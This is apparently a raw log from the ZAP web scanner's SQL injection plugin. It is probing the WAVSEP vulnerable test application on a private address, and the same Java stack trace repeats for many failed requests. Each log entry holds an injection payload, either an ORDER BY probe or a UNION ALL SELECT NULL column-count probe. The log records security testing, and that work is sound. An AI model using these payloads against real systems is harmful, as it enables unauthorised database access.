org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688379 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' ORDER BY 1-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini%' ORDER BY 1-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9688380 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' ORDER BY 8364-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini%' ORDER BY 8364-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9688382 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' UNION ALL SELECT NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini%' UNION ALL SELECT NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688383 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' UNION ALL SELECT NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini%' UNION ALL SELECT NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688384 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' UNION ALL SELECT NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini%' UNION ALL SELECT NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688385 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688386 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688387 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688388 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688389 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688389 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688391 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-FalsePositives-GET/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9688392 [ZAP-ActiveScanner-0] WARN 